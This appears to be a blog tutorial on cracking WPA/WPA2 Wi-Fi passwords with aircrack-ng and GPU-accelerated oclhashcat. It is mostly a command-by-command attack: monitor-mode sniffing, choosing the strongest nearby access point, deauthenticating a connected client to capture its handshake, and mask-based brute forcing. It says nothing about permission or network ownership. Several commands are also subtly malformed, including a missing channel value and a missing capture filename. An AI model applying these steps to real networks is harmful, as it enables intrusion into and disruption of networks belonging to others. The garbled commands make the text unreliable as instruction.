Use GPU to Speed Up WPA/WPA2 Password Cracking
There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)
- Aircrack-ng
- Oclhashcat
This guide assumes the following things:
- wlan0 is a WiFi interface
- mon0 is the interface in monitor mode
- <channel> refers to the channel the target WI-Fi is operating on
- 00:2d:37:4b:e4:d5 is the MAC address of target AP (access point) (not real)
- cc:cc:4e:5b:d7:3d is MAC of client associated with the target AP (not real)
- # (hash symbol) is used to mark start of a command
Steps:
Open up a terminal
Start by putting Wi-Fi interface in monitor mode
#airmon-ng start wlan0
This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.
Then, start sniffing air for all AP’s in the area.
#airodump-ng mon0
This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.
Press Ctrl+C to stop above command and type:
#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0
This command only sniffs for one specific AP:
-c tells which channel to sniff
-bssid is the MAC of AP to target
-w tell to write a file to capture handshake (for later use in recovering password)
mon0 is the monitor interface
Notice the MAC address of clients shown in the terminal; we’ll need it for the next step.
Now, open a second terminal and type:
#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0
This command says to de-authenticate a client from its AP
-0 tell how many time to send deauth signal (in this case 5 times)
-a tell the MAC of AP
-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)
mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).
Once handshake file is captured and written (in format file.cap), clean the file using the following command:
#wpaclean clean_file.cap captured.cap
Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured).
Now, prepare the file for hashcat by:
#aircrack-ng clean_file.cap -J for_cat
Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension)
Now, begin the cracking process by:
#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask
Here, –m 2500 tell to crack WPA/WPA2
-a 3 tells to use brute-force or mask based brute force (more on it later)
-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)
/for_cat.hccap is path to your captured and cleaned prepared hashcat file
/mymask.hccap is path to the mask file
Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali)
NOTES ON HASHCAT MASKSThe mask can take following format:
- ?u for upper case letters (ABC…)
- ?l for lower case letters (abc…)
- ?d for numbers
- ?s for symbols (ASCII only I think)
- ?a use all of the above characters
Thus to create a mask type in a black file:
- ?d?d?d?d?d?d?d?d for a 8 digit password
That’s it for this tutorial.
Leave Use GPU to Speed Up WPA/WPA2 Password Cracking to:
Read more #password posts
Best Posts From capehost
We have not curated any of capehost's posts yet. But you can encourage our curation team to review posts by visiting them regularly and by referring other readers. Because we give priority to frequently read content.